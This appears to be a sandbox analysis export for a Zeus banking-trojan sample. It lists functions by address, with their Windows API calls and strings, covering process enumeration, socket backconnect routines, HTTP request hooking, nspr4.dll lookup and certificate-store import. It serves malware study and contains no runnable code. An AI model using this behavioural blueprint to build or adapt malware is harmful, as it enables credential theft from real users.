WaitForSingleObject.KERNEL32(?,000003E8), ref: 003B5BD6
TerminateProcess.KERNEL32(?,00000000), ref: 003B5BE3

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041CCCF, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 60

APIs

Part of subcall function 004135C6: MultiByteToWideChar.KERNEL32(00412884,00000000,?,00411FF2,?,7718F8FF,00412884,00000000,00000032,?,7718F8FF,00000000), ref: 004135DD

StrCmpNIW.SHLWAPI(C:\Users\admin\AppData\Roaming,013FF800,00000000), ref: 0041CD57
lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 0041CD6F

Strings

C:\Users\admin\AppData\Roaming, xrefs: 0041CD1A, 0041CD56
p.B, xrefs: 0041CD01

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040BB5F, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

Part of subcall function 00412507: CreateMutexW.KERNELBASE(00422C30,00000000,?,?,?,?,?), ref: 00412528

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

GetCurrentThread.KERNEL32(000000F1,19367401,00000001), ref: 0040BB89
SetThreadPriority.KERNEL32(00000000), ref: 0040BB90
WaitForSingleObject.KERNEL32(00001388), ref: 0040BBA8

Part of subcall function 004131CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004131ED
Part of subcall function 004131CC: Process32FirstW.KERNEL32(000001E6,?), ref: 00413216
Part of subcall function 004131CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00413271
Part of subcall function 004131CC: CloseHandle.KERNEL32(00000000), ref: 0041328E
Part of subcall function 004131CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 004132A1
Part of subcall function 004131CC: CloseHandle.KERNEL32(?), ref: 0041330E
Part of subcall function 004131CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 0041331A
Part of subcall function 004131CC: CloseHandle.KERNEL32(000001E6), ref: 0041332B

WaitForSingleObject.KERNEL32(00001388), ref: 0040BBBD

Part of subcall function 00416B8E: ReleaseMutex.KERNEL32(00000000,00413021,?,?,?), ref: 00416B92

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BBB5F, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

Part of subcall function 003C2507: CreateMutexW.KERNEL32(003D2C30,00000000,?,?,?,?,?), ref: 003C2528

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

GetCurrentThread.KERNEL32(000000F1,19367401,00000001), ref: 003BBB89
SetThreadPriority.KERNEL32(00000000), ref: 003BBB90
WaitForSingleObject.KERNEL32(00001388), ref: 003BBBA8

Part of subcall function 003C31CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003C31ED
Part of subcall function 003C31CC: Process32FirstW.KERNEL32(000001E6,?), ref: 003C3216
Part of subcall function 003C31CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 003C3271
Part of subcall function 003C31CC: CloseHandle.KERNEL32(00000000), ref: 003C328E
Part of subcall function 003C31CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 003C32A1
Part of subcall function 003C31CC: CloseHandle.KERNEL32(?), ref: 003C330E
Part of subcall function 003C31CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 003C331A
Part of subcall function 003C31CC: CloseHandle.KERNEL32(000001E6), ref: 003C332B

WaitForSingleObject.KERNEL32(00001388), ref: 003BBBBD

Part of subcall function 003C6B8E: ReleaseMutex.KERNEL32(00000000,003C3021,?,?,?), ref: 003C6B92

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00416B28, Relevance: 6.0, APIs: 4, Instructions: 42

APIs

TranslateMessage.USER32(?), ref: 00416B4A
DispatchMessageW.USER32(?), ref: 00416B55
PeekMessageW.USER32(00000000), ref: 00416B65
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00416B79

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C6B28, Relevance: 6.0, APIs: 4, Instructions: 42

APIs

TranslateMessage.USER32(?), ref: 003C6B4A
DispatchMessageW.USER32(?), ref: 003C6B55
PeekMessageW.USER32(00000000), ref: 003C6B65
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 003C6B79

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00414A30, Relevance: 6.0, APIs: 4, Instructions: 36

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00414A3D
Thread32First.KERNEL32(00000000,?), ref: 00414A58
Thread32Next.KERNEL32(00000000,0000001C), ref: 00414A6E
CloseHandle.KERNEL32(00000000), ref: 00414A79

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041040D, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217

APIs

Part of subcall function 00416973: getsockname.WS2_32(?,?,?), ref: 00416991

Part of subcall function 0041636E: recv.WS2_32(?,?,00000004,00000000), ref: 00416392

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 004104DC
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 00410515

Part of subcall function 004164FD: socket.WS2_32(00000000,00000001,00000006), ref: 00416506
Part of subcall function 004164FD: bind.WS2_32(00000000,?,-0000001D), ref: 00416526
Part of subcall function 004164FD: listen.WS2_32(00000000,?), ref: 00416535
Part of subcall function 004164FD: closesocket.WS2_32(00000000), ref: 00416540

Part of subcall function 0041672E: accept.WS2_32(00000000,00000000,00000000), ref: 00416754

Part of subcall function 00416403: socket.WS2_32(?,00000001,00000006), ref: 0041640C
Part of subcall function 00416403: connect.WS2_32(00000000,?,-0000001D), ref: 0041642C
Part of subcall function 00416403: closesocket.WS2_32(00000000), ref: 00416437

Part of subcall function 004167B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004167CC

Part of subcall function 004165B7: recv.WS2_32(?,?,00000400,00000000), ref: 00416600
Part of subcall function 004165B7: send.WS2_32(?,?,00000000,00000000), ref: 0041661A
Part of subcall function 004165B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00416657

Part of subcall function 0041675E: shutdown.WS2_32(00000000,00000002), ref: 00416766
Part of subcall function 0041675E: closesocket.WS2_32(00000000), ref: 0041676D

Part of subcall function 00410397: getpeername.WS2_32(000000FF,00000000,00000000), ref: 004103BB
Part of subcall function 00410397: getsockname.WS2_32(000000FF,00000000,00000000), ref: 004103CA

Strings

Z, xrefs: 0041064F

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041773A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103

APIs

Part of subcall function 004146F4: GetTickCount.KERNEL32(00418766,?), ref: 004146F4

CharUpperW.USER32(00000000), ref: 0041785B

Strings

aeiouy, xrefs: 00417768, 00417771, 004177A9, 004177B2
bcdfghklmnpqrstvwxz, xrefs: 00417759

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C773A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103

APIs

Part of subcall function 003C46F4: GetTickCount.KERNEL32(003C8766,?), ref: 003C46F4

CharUpperW.USER32(00000000), ref: 003C785B

Strings

bcdfghklmnpqrstvwxz, xrefs: 003C7759
.exe, xrefs: 003C7745

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041D64B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 0041D664

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

GetSystemTime.KERNEL32(?), ref: 0041D6B0

Part of subcall function 0041D42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0041D581,?,?,00000000), ref: 0041D43F

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Strings

.txt, xrefs: 0041D746

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CA594, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97

APIs

Part of subcall function 003C54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 003C5505
Part of subcall function 003C54F1: GetLastError.KERNEL32 ref: 003C550F
Part of subcall function 003C54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 003C552F

Part of subcall function 003C55A1: HttpQueryInfoA.WININET(?,?,?,?,00000000), ref: 003C55BA
Part of subcall function 003C55A1: GetLastError.KERNEL32(?,00000000), ref: 003C55C0
Part of subcall function 003C55A1: HttpQueryInfoA.WININET(?,?,00000000,?,00000000), ref: 003C55E2

HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 003CA5F4

Part of subcall function 003C5547: InternetQueryOptionW.WININET(0000001C,0000001C,00000000,?), ref: 003C555D
Part of subcall function 003C5547: GetLastError.KERNEL32(?,003CA663,?,0000001C,?,00000000,00000048), ref: 003C5567
Part of subcall function 003C5547: InternetQueryOptionW.WININET(0000001C,0000001C,00000000,?), ref: 003C5589

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003B6BD7: RegOpenKeyExW.ADVAPI32(80000001,003D27F0,00000000,00000001,?,?), ref: 003B6C00

Part of subcall function 003C9A9E: RegOpenKeyExW.ADVAPI32(80000001,003D3EC0,00000000,00000001,?), ref: 003C9ADD

Strings

G, xrefs: 003CA615
n><>F>, xrefs: 003CA5F4

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00407EF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93

APIs

CoCreateInstance.OLE32(004016C0,00000000,00004401,004016D0,?), ref: 00407F29
CoCreateInstance.OLE32(00401690,00000000,00004401,004016A0,?), ref: 00407F7C

Strings

D, xrefs: 00407FA7

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B7EF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93

APIs

CoCreateInstance.OLE32(003B16C0,00000000,00004401,003B16D0,?), ref: 003B7F29
CoCreateInstance.OLE32(003B1690,00000000,00004401,003B16A0,?), ref: 003B7F7C

Strings

D, xrefs: 003B7FA7

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041B4D3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64

APIs

GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 0041B4F0

Part of subcall function 0041B265: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041B28C
Part of subcall function 0041B265: GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0041B2E0
Part of subcall function 0041B265: GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 0041B343
Part of subcall function 0041B265: GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 0041B36F

Part of subcall function 004133A3: HeapAlloc.KERNEL32(00000000,-00000004,0041B51B), ref: 004133B4

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

p A, xrefs: 0041B554, 0041B56E, 0041B557
nspr4.dll, xrefs: 0041B4EB

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CB4D3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64

APIs

GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 003CB4F0

Part of subcall function 003CB265: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003CB28C
Part of subcall function 003CB265: GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 003CB2E0
Part of subcall function 003CB265: GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 003CB343
Part of subcall function 003CB265: GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 003CB36F

Part of subcall function 003C33A3: HeapAlloc.KERNEL32(00000000,-00000004,003CB51B), ref: 003C33B4

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Strings

nspr4.dll, xrefs: 003CB4EB
p <, xrefs: 003CB554, 003CB56E, 003CB557

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C515D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62

APIs

WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003C5186

Part of subcall function 003C3346: HeapAlloc.KERNEL32(00000008,-00000003,003C36F5,?,?,00000000,003C41E1,?,?,?,?,?,003C4191,?,?,?), ref: 003C3368
Part of subcall function 003C3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,003C36F5,?,?,00000000,003C41E1,?,?,?,?,?,003C4191,?,?), ref: 003C3379

InternetReadFile.WININET(?,00001000,00001000,00001000), ref: 003C51BD

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Strings

P>Z>d>2>n><>F>, xrefs: 003C51BD

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00409C58, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00409CA8

Part of subcall function 00418AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00418B23
Part of subcall function 00418AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418B4A
Part of subcall function 00418AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00418B94
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00418BC1
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?), ref: 00418BF1
Part of subcall function 00418AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00418C1F
Part of subcall function 00418AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00418C31

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

#, xrefs: 00409C8C
&, xrefs: 00409C7E

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040A579, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 0040A5C9

Part of subcall function 00418AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00418B23
Part of subcall function 00418AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418B4A
Part of subcall function 00418AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00418B94
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00418BC1
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?), ref: 00418BF1
Part of subcall function 00418AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00418C1F
Part of subcall function 00418AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00418C31

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

#, xrefs: 0040A5AD
&, xrefs: 0040A59F

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BA579, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 003BA5C9

Part of subcall function 003C8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 003C8B23
Part of subcall function 003C8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003C8B4A
Part of subcall function 003C8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 003C8B94
Part of subcall function 003C8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 003C8BC1
Part of subcall function 003C8AE4: Sleep.KERNEL32(00000000,?,?), ref: 003C8BF1
Part of subcall function 003C8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 003C8C1F
Part of subcall function 003C8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 003C8C31

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Strings

&, xrefs: 003BA59F
#, xrefs: 003BA5AD

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B9C58, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 003B9CA8

Part of subcall function 003C8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 003C8B23
Part of subcall function 003C8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003C8B4A
Part of subcall function 003C8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 003C8B94
Part of subcall function 003C8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 003C8BC1
Part of subcall function 003C8AE4: Sleep.KERNEL32(00000000,?,?), ref: 003C8BF1
Part of subcall function 003C8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 003C8C1F
Part of subcall function 003C8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 003C8C31

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Strings

&, xrefs: 003B9C7E
#, xrefs: 003B9C8C

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00412B08, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

GetModuleHandleW.KERNEL32(?), ref: 00412B1F
GetProcAddress.KERNEL32(00000000,?), ref: 00412B41

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

0x01D9C0A0, xrefs: 00412B63

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CAA1A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 003CAA6E

Part of subcall function 003CA6AF: SetLastError.KERNEL32(00002F78), ref: 003CA6F6
Part of subcall function 003CA6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 003CA762
Part of subcall function 003CA6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 003CA77E
Part of subcall function 003CA6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 003CA795
Part of subcall function 003CA6AF: EnterCriticalSection.KERNEL32(003D3F24), ref: 003CA79D
Part of subcall function 003CA6AF: LeaveCriticalSection.KERNEL32(003D3F24,?), ref: 003CA853
Part of subcall function 003CA6AF: EnterCriticalSection.KERNEL32(003D3F24), ref: 003CA87A
Part of subcall function 003CA6AF: LeaveCriticalSection.KERNEL32(003D3F24,?), ref: 003CA8BA

HttpSendRequestExA.WININET(?,?,?,?,?), ref: 003CAAA9

Strings

<>F>, xrefs: 003CAAA9

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CA97E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 003CA9D2

Part of subcall function 003CA6AF: SetLastError.KERNEL32(00002F78), ref: 003CA6F6
Part of subcall function 003CA6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 003CA762
Part of subcall function 003CA6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 003CA77E
Part of subcall function 003CA6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 003CA795
Part of subcall function 003CA6AF: EnterCriticalSection.KERNEL32(003D3F24), ref: 003CA79D
Part of subcall function 003CA6AF: LeaveCriticalSection.KERNEL32(003D3F24,?), ref: 003CA853
Part of subcall function 003CA6AF: EnterCriticalSection.KERNEL32(003D3F24), ref: 003CA87A
Part of subcall function 003CA6AF: LeaveCriticalSection.KERNEL32(003D3F24,?), ref: 003CA8BA

HttpSendRequestExW.WININET(?,?,?,?,?), ref: 003CAA0D

Strings

2>n><>F>, xrefs: 003CAA0D

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C2B08, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

GetModuleHandleW.KERNEL32(?), ref: 003C2B1F
GetProcAddress.KERNEL32(00000000,?), ref: 003C2B41

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Strings

0x01D9C0A0, xrefs: 003C2B63

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C8737, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 003C874E

Part of subcall function 003C46F4: GetTickCount.KERNEL32(003C8766,?), ref: 003C46F4

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

Part of subcall function 003C8C40: PathCombineW.SHLWAPI(003C1F45,003C1F45,?), ref: 003C8C5F

Part of subcall function 003C856B: CreateFileW.KERNEL32(003C4E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 003C8585
Part of subcall function 003C856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003C85A8
Part of subcall function 003C856B: CloseHandle.KERNEL32(00000000), ref: 003C85B5

Strings

%s%08x.%s, xrefs: 003C876C
tmp, xrefs: 003C8767

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00416F8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00416FB1

Part of subcall function 00418716: SetFileAttributesW.KERNEL32(00000080,00000080,0041B4CD,?), ref: 0041871F
Part of subcall function 00418716: DeleteFileW.KERNEL32(?), ref: 00418729

PathFindFileNameW.SHLWAPI(?), ref: 00416FD3

Part of subcall function 0041353A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00414232,00000000,00000000,00000000,00413597,00000000,00000000,00000000,?,00000000), ref: 00413555

Strings

cab, xrefs: 00416FA6

Memory Dump Source

